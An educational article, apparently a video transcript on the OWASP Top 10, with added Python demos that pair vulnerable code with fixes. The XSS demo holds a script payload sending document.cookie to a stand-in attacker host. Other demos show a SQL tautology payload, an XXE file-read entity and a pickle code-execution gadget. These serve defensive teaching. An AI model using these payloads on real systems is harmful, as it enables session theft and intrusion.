The OWASP top 10 web application vulnerabilities. This is a useful topic for both web app pentesters and bug bounty hunters. OWASP stands for Open Web Application Security Project. It is an international organization dedicated to improving the security of software applications. OWASP provides tools and resources for engineers to help make applications more secure. One of OWASP's most important contributions is the OWASP Top 10 vulnerabilities list. The Top 10 lists the ten most critical web application security risks. It is widely recognized as a standard for web application security. By learning the OWASP Top 10 security risks, organizations can reduce the risk of attacks against their applications. (The ten categories covered here are those of the 2017 edition of the list; the 2021 edition merged, renamed and added some categories, but the underlying weaknesses are the same.) Let's look at each of them in detail.

Injection is a type of vulnerability in which an attacker injects malicious code into a web app. Injection can lead to unauthorized access to sensitive data, loss of data, or even complete system compromise. An example of an injection attack is SQL injection. This is where an attacker injects malicious SQL code into the web application's SQL query. This is usually possible when input to the web app is not properly checked. If successful, the malicious SQL is executed by the database server. Another example is command injection. Here an attacker injects shell commands into a command line that the web application builds and runs. This can lead to devastating consequences, including a complete system takeover. To prevent injection attacks, it is important to validate and sanitize all user input, and to use prepared (parameterized) SQL queries in the back end instead of generating SQL queries on the fly by concatenating strings. Additionally, keep all software and libraries up to date with the latest security patches.

Insufficient monitoring and logging refers to the lack of proper monitoring and logging. This can make it difficult to detect and respond to security incidents. For example, if a system does not have proper logging in place, it will be difficult to detect when an attacker tries to compromise a web application. Additionally, if the system does not have real-time monitoring, it will be difficult to detect security incidents in time. To address insufficient monitoring and logging, you should implement a robust monitoring system that captures a wide range of events. This can include logging access to sensitive data, network traffic and system logs, as well as monitoring network devices and systems for signs of suspicious activity. Additionally, you should review and analyze log data to identify trends and potential security incidents.

Broken authentication refers to weaknesses in the authentication process of a web application. This includes issues such as weak or easily guessable passwords, lack of proper password management, and the use of vulnerable authentication mechanisms. For example, an attacker can exploit a system that allows weak passwords by guessing common passwords. They can also use brute-force tools like Hydra and other password-cracking tools. Another example is the use of easily guessed security questions, such as "what is your mother's maiden name?". This can be easily answered by an attacker who has done basic research on the target. To prevent broken authentication, enable strong authentication mechanisms such as multi-factor authentication. Also enforce password policies. The traditional policy of requiring users to change passwords periodically is less effective than it looks: current guidance such as NIST SP 800-63B advises against forced periodic rotation, and instead recommends screening new passwords against lists of common and breached passwords and rate-limiting or locking out repeated failed logins.

Sensitive data exposure refers to the practice of storing and transmitting sensitive information, such as passwords, credit card numbers and personal identification numbers, without protective measures such as encryption. This can result in the data being intercepted, stolen, or even manipulated by malicious attackers. To mitigate this risk, you should always encrypt sensitive information when stored and transmitted. For passwords this means storing salted password hashes (computed with a deliberately slow function such as Argon2, scrypt or PBKDF2) instead of plaintext passwords, so that a leaked database does not reveal them. Appropriate access control should be put in place to ensure only authorized personnel have access to sensitive data.

XML External Entities (XXE) is a security vulnerability that affects XML parsers when they parse untrusted XML input. This vulnerability allows an attacker to inject malicious entity declarations into an XML document, which the parser then resolves, for example to read local files or make requests from the server. This can lead to exposure of sensitive information, denial of service, and even remote code execution. To prevent XXE attacks, applications should validate and sanitize XML input. You should also disable external entity and DTD processing by default. Additionally, use a less complex data format such as JSON whenever possible.

While authentication tells us whether a user can access a system, access control tells us who can access a specific resource in the system. Broken access control is a security vulnerability that occurs when an application does not restrict access to sensitive resources. This includes files, database records, or even functionality that should be limited to select users. Broken access control can lead to unauthorized users being able to view, modify, or delete sensitive data. To reduce this risk, implement access control policies and authentication mechanisms, enforced on the server side for every request. You can also assign access rights based on the principle of least privilege, meaning that users should only have the minimum access required to perform their job. Regular security audits and assessments will help identify and address any potential access control vulnerabilities.

Security misconfiguration is a security vulnerability that arises when an application is not configured properly. This can result in exposure of sensitive data such as error messages or system information. For example, if you don't change the default settings of your backend application (such as a debug mode that is on by default), it can expose detailed error messages and stack traces to the user instead of handling errors gracefully. To reduce this risk, we should configure systems according to industry best practices. We should also apply appropriate security controls and patches as needed. Additionally, we should perform regular security scans and assessments to identify and address any misconfigurations.

Cross-site scripting (XSS) is a common security vulnerability. It is done by injecting malicious scripts into a web page, which are then executed by the victim's web browser. For example, consider a web page that allows users to post comments. An attacker could draft a comment that contains malicious JavaScript code. If the input is not sanitized, this code will execute in the browser of every user who opens the comments page. XSS attacks can reveal sensitive information such as login credentials or session cookies, perform unauthorized actions on behalf of the victim, or even redirect the victim to a malicious website. To prevent XSS attacks, always escape user-generated content for the context in which it is rendered (HTML body, attribute, JavaScript or URL) and validate input data on the server side.

Deserialization is the process of converting a stream of bytes back into a data structure that will be used by a program. Insecure deserialization is a vulnerability that occurs when a web app deserializes untrusted data. For example, consider a web application that allows users to upload a file containing serialized Java objects. The web application then deserializes the objects and processes them. An attacker can craft a malicious file which, when deserialized, will execute arbitrary code. This can allow an attacker to perform various types of attacks, such as remote code execution, privilege escalation, and data theft. To prevent insecure deserialization attacks, it is important to validate all inputs, and preferably to avoid native object serialization formats for untrusted data altogether in favour of plain data formats such as JSON. Additionally, limit the amount of code that runs with high privileges and ensure that all sensitive data is encrypted.

When you plan to use a piece of software, always check for known vulnerabilities. There are many public databases, like Exploit-DB, which contain publicly disclosed vulnerabilities for various software and applications. Failing to do this can leave the system open to attack, as attackers can exploit these vulnerabilities to gain access to sensitive information. For example, an application may use a third-party library to handle file uploads, but the library might have a known vulnerability. If the application uses the vulnerable library, it is open to attack even if the rest of the application is secure. Make sure you do your research before using any third-party software for your business.

To summarize, the OWASP Top 10 is a vital checklist that we can use to keep our web applications and software secure. As a pentester or a bug bounty hunter, you should be aware of these vulnerabilities to stay ahead of attackers. Always sanitize user input, employ logging, and do your research before using any third-party software. Hope you found this video useful. If you have any questions, please let me know in the comments. See you soon with another topic.
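The injection section above contrasts queries built on the fly with prepared queries. The following added example (not code from the video) shows both against a constructed in-memory SQLite table: the string-formatted query lets the classic tautology payload return every user, while the parameterized version treats the same input as a plain value. The table, names and the `find_user_*` helpers are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample table standing in for the web app's user store.
SAMPLE_USERS = [("alice", "admin"), ("bob", "user"), ("carol", "user")]

# Classic tautology payload: closes the quoted string and appends OR '1'='1.
PAYLOAD = "' OR '1'='1"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)"
    )
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, username):
    # The input is spliced into the SQL text, so a quote inside `username`
    # changes the structure of the query rather than the value being compared.
    query = "SELECT username FROM users WHERE username = '%s' ORDER BY id" % username
    return [row[0] for row in conn.execute(query)]


def find_user_safe(conn, username):
    # Prepared (parameterized) query: the SQL text is fixed and the driver
    # binds `username` as data, so it can only ever be compared, never parsed.
    query = "SELECT username FROM users WHERE username = ? ORDER BY id"
    return [row[0] for row in conn.execute(query, (username,))]


if __name__ == "__main__":
    db = make_db()
    print(find_user_vulnerable(db, PAYLOAD))  # ['alice', 'bob', 'carol']
    print(find_user_safe(db, PAYLOAD))        # []
```

Note that the vulnerable function is not "wrong" SQL; it is a perfectly valid query whose WHERE clause the attacker now controls. Escaping quotes by hand is not a substitute for parameter binding: the database driver knows the exact quoting rules of the target engine, your escaping routine probably does not.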
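The monitoring section says logs must be reviewed for signs of suspicious activity, and the broken authentication section names Hydra-style brute forcing as the attack to watch for. The following added example (not from the video) runs a small detection over constructed login log lines: it keeps a sliding window of failed logins per source address, raises an alert when the count crosses a threshold, and raises a second, higher-priority alert if that same source later logs in successfully. The log format, field names, threshold and window are assumptions for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines in a made-up "timestamp level login outcome ..."
# format; they are not from any real product. Source 203.0.113.7 sprays five
# guesses in a few seconds and later succeeds, the trace a brute-force tool
# like Hydra leaves behind.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z INFO login success user=alice src=10.0.0.5
2024-03-01T10:00:03Z WARN login failed user=admin src=203.0.113.7
2024-03-01T10:00:04Z WARN login failed user=admin src=203.0.113.7
2024-03-01T10:00:05Z WARN login failed user=root src=203.0.113.7
2024-03-01T10:00:06Z WARN login failed user=admin src=203.0.113.7
2024-03-01T10:00:07Z WARN login failed user=test src=203.0.113.7
2024-03-01T10:00:09Z WARN login failed user=bob src=198.51.100.2
2024-03-01T10:03:00Z INFO login success user=admin src=203.0.113.7
"""

LINE_RE = re.compile(r"^(\S+) \w+ login (success|failed) user=(\S+) src=(\S+)$")


def parse_log(text):
    """Yield (timestamp, outcome, user, src) for each well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m.group(2), m.group(3), m.group(4)


def detect_bruteforce(text, threshold=5, window=timedelta(seconds=60)):
    """Alert once per source that fails `threshold` logins inside `window`,
    and again if a flagged source later succeeds."""
    recent = defaultdict(deque)  # src -> timestamps of failures inside the window
    flagged = set()
    alerts = []
    for ts, outcome, user, src in parse_log(text):
        if outcome == "failed":
            q = recent[src]
            q.append(ts)
            while ts - q[0] > window:  # drop failures that fell out of the window
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, len(q)))
        elif src in flagged:
            # A success from a source that was brute-forcing is the event that
            # most needs a response: that account is probably compromised.
            alerts.append(("success_after_bruteforce", src, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The same logic is what a SIEM correlation rule expresses declaratively; the point of writing it out is to see what the logs must contain for it to work at all: a timestamp, the outcome, the account and the source address on every authentication event. A log line that omits the source address cannot feed this rule.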
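The sensitive data exposure section says passwords must never be stored in plaintext, and the broken authentication section asks for a policy that keeps weak passwords out. The following added example (not from the video) implements both with the standard library: a policy check against a constructed common-password list, salted PBKDF2-HMAC-SHA256 hashing with the iteration count OWASP's password storage cheat sheet recommends, and constant-time verification. The storage string format, the word list and the minimum length are assumptions for the demonstration; Argon2 or scrypt would be preferred where available.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000   # OWASP's recommended count for PBKDF2-HMAC-SHA256
SALT_BYTES = 16

# Constructed shortlist standing in for a breached-password corpus.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "admin123"}


def password_policy_violation(password):
    """Return a reason if the password should be rejected, else None."""
    if len(password) < 12:
        return "too short"
    if password.lower() in COMMON_PASSWORDS:
        return "on the common-password list"
    return None


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$<iterations>$<salt>$<hash>' for storage."""
    if salt is None:
        # A fresh random salt per user means two users with the same password
        # get different records, and precomputed tables are useless.
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256${}${}${}".format(
        ITERATIONS,
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    )


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    algo, iterations, salt_b64, hash_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(hash_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iterations))
    # hmac.compare_digest does not short-circuit on the first differing byte.
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))  # True
```

Storing the iteration count inside the record lets you raise it later and re-hash users on their next successful login, rather than being stuck with whatever cost was chosen on day one.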
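The XXE section's advice is to disable DTD and external entity processing. The following added example (not from the video) shows what that looks like with Python's low-level expat parser: in permissive mode the parser silently substitutes an entity declared in the DOCTYPE into the document's text, which is the same mechanism an XXE payload uses with `SYSTEM "file:///etc/passwd"`; in hardened mode a handler rejects any DOCTYPE before a single entity can be declared. The document and the `extract_text` helper are constructed for the demonstration; an internal entity is used so that the example runs offline and touches no files. The `defusedxml` package applies the same idea to the higher-level standard-library parsers.

```python
import xml.parsers.expat


class ForbiddenDoctype(ValueError):
    """Raised when a document carries a DOCTYPE, the only place entities are declared."""


# Constructed sample. A real XXE payload would read
# <!ENTITY leak SYSTEM "file:///etc/passwd">; the literal value here shows the
# substitution happening without touching the filesystem.
SAMPLE_XML = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE note [<!ENTITY leak "contents-of-the-entity">]>'
    "<note><body>&leak;</body></note>"
)

PLAIN_XML = "<note><body>hello</body></note>"


def extract_text(xml_doc, forbid_dtd=True):
    """Return the concatenated character data of `xml_doc`.

    With forbid_dtd=True (the safe default) a DOCTYPE aborts parsing, so no
    entity, internal or external, can ever be declared or resolved.
    """
    chunks = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenDoctype(f"DOCTYPE {name!r} rejected: DTD processing is disabled")

    if forbid_dtd:
        parser.StartDoctypeDeclHandler = on_doctype
    parser.CharacterDataHandler = chunks.append  # receives entity-expanded text
    parser.Parse(xml_doc, True)
    return "".join(chunks)


if __name__ == "__main__":
    print(extract_text(SAMPLE_XML, forbid_dtd=False))  # contents-of-the-entity
    try:
        extract_text(SAMPLE_XML)
    except ForbiddenDoctype as exc:
        print("rejected:", exc)
```

Rejecting the DOCTYPE outright is the simplest robust fix because it also closes the entity-expansion denial-of-service variants ("billion laughs"), which need no external resources at all. If your schema genuinely requires a DTD, disable external entity resolution instead and cap expansion, but treat that as the exception.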
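The broken access control section distinguishes authentication (may this user use the system?) from access control (may this user touch this resource?) and asks for least privilege. The following added example (not from the video) shows the gap in code: a lookup that only requires the caller to be logged in, beside one that checks ownership and a small role-to-action policy on every request. The invoice model, the roles and the policy table are assumptions for the demonstration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "customer", "support" or "admin"


@dataclass(frozen=True)
class Invoice:
    id: int
    owner_id: int
    amount: float


class Forbidden(PermissionError):
    """The caller is authenticated but not allowed to perform this action."""


# Constructed sample data: three invoices belonging to two customers.
INVOICES = {
    101: Invoice(101, owner_id=1, amount=49.0),
    102: Invoice(102, owner_id=1, amount=12.5),
    103: Invoice(103, owner_id=2, amount=300.0),
}

# Least-privilege policy: roles that may perform an action on *any* invoice.
# Owners additionally get OWNER_ACTIONS on their own invoices, nothing more.
ROLE_ACTIONS = {
    "view": {"support", "admin"},
    "refund": {"admin"},
    "delete": {"admin"},
}
OWNER_ACTIONS = {"view"}


def get_invoice_vulnerable(user, invoice_id):
    # Insecure direct object reference: being logged in is the only check, so
    # customer 2 reads invoice 101 simply by changing the id in the request.
    return INVOICES[invoice_id]


def authorize(user, action, invoice):
    if user.role in ROLE_ACTIONS.get(action, set()):
        return True
    return invoice.owner_id == user.id and action in OWNER_ACTIONS


def get_invoice_safe(user, invoice_id, action="view"):
    invoice = INVOICES.get(invoice_id)
    if invoice is None or not authorize(user, action, invoice):
        # Same answer for "does not exist" and "not yours", so a caller cannot
        # enumerate which ids exist by watching the error type.
        raise Forbidden(f"{action} on invoice {invoice_id} denied")
    return invoice


if __name__ == "__main__":
    customer2 = User(2, "customer")
    print(get_invoice_vulnerable(customer2, 101))  # someone else's invoice
    try:
        get_invoice_safe(customer2, 101)
    except Forbidden as exc:
        print("denied:", exc)
```

The check lives in the server-side handler, next to the data access, and runs for every action on every request. Hiding the link in the UI, or checking only on the listing page and not on the detail endpoint, is exactly the pattern bug bounty hunters test first.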
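The XSS section uses a comments page as its example. The following added example (not from the video) renders a comment two ways: raw string interpolation, which lets a posted `<script>` tag and an attribute-breakout payload reach the browser as markup, and the same template with `html.escape`, which turns the payload into inert text in both the element body and the attribute position. The markup, the payloads and the `render_comment_*` helpers are constructed for the demonstration.

```python
import html

# Constructed attacker input. The body payload exfiltrates the session cookie;
# the author payload closes the attribute it is placed in and adds a handler.
PAYLOAD_BODY = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
PAYLOAD_AUTHOR = 'mallory" onmouseover="alert(document.cookie)'


def render_comment_vulnerable(author, body):
    # Raw interpolation: whatever the user typed becomes part of the page's markup.
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author, body):
    # html.escape replaces < > & " ' with entities, so the browser displays the
    # payload instead of parsing it. quote=True (the default) is what makes it
    # safe inside a double-quoted attribute as well as in element text.
    return (
        f'<div class="comment" data-author="{html.escape(author)}">'
        f"<p>{html.escape(body)}</p></div>"
    )


if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD_AUTHOR, PAYLOAD_BODY))
    print(render_comment_safe(PAYLOAD_AUTHOR, PAYLOAD_BODY))
```

Escaping is context-specific: this function is correct for HTML text and double-quoted attributes, but content placed inside a `<script>` block, a `javascript:` URL or an unquoted attribute needs different encoding, and user-supplied URLs must additionally be restricted to `http`/`https`. Template engines that escape by default, plus a Content-Security-Policy as defence in depth, are the production form of the same control.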
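The insecure deserialization section describes an uploaded file of serialized Java objects that runs code when deserialized. The following added example (not from the video) reproduces that scenario with Python's `pickle`, whose streams can likewise instruct the loader to call arbitrary functions: one "upload" is crafted to invoke a function on load, and a restricted unpickler refuses it while still loading an honest data blob. The side-effect function only records that it ran, standing in for what a real gadget would do; the payloads, the allowlist and the helper names are constructed for the demonstration.

```python
import io
import pickle

EXECUTED = []  # records what ran during deserialization, for the demo only


def attacker_side_effect(marker):
    # Stand-in for os.system(...) or similar in a real exploit chain.
    EXECUTED.append(marker)
    return marker


class Exploit:
    # pickle serializes an object by calling __reduce__; the returned tuple
    # names a callable and its arguments, and the unpickler calls it on load.
    # That is the whole attack: the uploaded file is a program.
    def __reduce__(self):
        return (attacker_side_effect, ("ran during unpickling",))


# Constructed "uploads": one crafted by the attacker, one an honest session blob.
MALICIOUS_UPLOAD = pickle.dumps(Exploit())
BENIGN_UPLOAD = pickle.dumps({"user": "alice", "cart": [101, 102]})


class RestrictedUnpickler(pickle.Unpickler):
    """Only globals on the allowlist may be referenced by the stream. Plain
    containers and scalars never go through find_class, so they still load."""

    # Extend deliberately and never with anything that executes (eval, os.*).
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_trusting(data):
    return pickle.loads(data)  # what the vulnerable application does


def load_restricted(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    load_trusting(MALICIOUS_UPLOAD)
    print("after pickle.loads:", EXECUTED)  # the attacker's function ran
    try:
        load_restricted(MALICIOUS_UPLOAD)
    except pickle.UnpicklingError as exc:
        print("restricted loader:", exc)
    print(load_restricted(BENIGN_UPLOAD))
```

The restricted loader is a containment measure, not a licence to accept pickles from users: the stream format itself gives the sender control over which constructors run. The better fix, as the section says, is to take untrusted input in a data-only format such as JSON and validate it against a schema.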